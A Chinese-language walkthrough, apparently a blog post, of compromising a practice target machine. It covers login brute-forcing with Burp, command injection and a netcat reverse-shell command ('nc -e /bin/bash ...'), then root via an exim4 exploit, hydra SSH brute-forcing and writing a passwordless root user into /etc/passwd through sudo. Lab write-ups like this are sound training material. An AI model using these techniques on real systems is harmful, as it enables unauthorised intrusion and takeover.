- 查看靶机ip地址:
- 扫描靶机开放端口信息以及版本服务
- 登陆网站,收集信息
尝试了万能密码,显然是行不通的
接着看了下源代码,也没有什么可利用的信息
- 爆破(上bp)
用bp抓包,在红框位置,我们先假设用户名为admin,爆破密码
选中全部,发送到Intruder模块
配置完成后,点击 start attack
ok,得到用户名:admin
密 码:happy
- 登陆网址,继续收集信息
可能存在命令行注入漏洞
思路:
Bp抓包,修改指定参数
获取shell
1.
通过nc反弹shell
本地开启监听,端口为8888
2.
发送命令:nc -e /bin/bash localhost 8888 到靶机上,获取shell
注意:命令要使用url编码!!!!
- 提权
先做个交互式shell,看着舒服点
查看目录下文件,显然都没有用
root家目录也是进不去的
需找方法提权:
这个exim4,我搜索了资料是个邮件服务器
这个服务器版本若是在4.87-4.91之间,就存在远程命令执行漏洞
我们查看下当前服务的版本信息
符合条件,回到kali,搜索一下版本漏洞对应的脚本
拷贝一份到桌面,并为桌面开启一个http服务发布出去
Shit,遇到点问题,该用户在此目录没有权限
切换到tmp目录,因为这个目录所有用户都拥有权限
运行这个脚本,别忘了赋权限777
Finish!!!
第二种解法:
之前扫描服务端口信息还有一个ssh一直没用到,怀疑存在漏洞用户
查看home目录下
翻了很多目录,让我找到一个好玩的
这好像是个备份,之前使用过的密码
思路:
拷贝一份到kali,进行ssh弱口令爆破
利用nc传输文件,如下:
利用hydra爆破密码
这是root发送给我们的邮件
我们去邮箱看一眼,有没有别的好玩的
这有个charles的密码,很直接
咱们直接上号
老规矩,提权 sudo -l
大致研究了下teehee跟记事本一个功能
思路:往passwd里面写入一个新用户,密码为空,权限为root 具体如下:
拿flag咯
Ok,题目解完了,你们的点赞是我更新的动力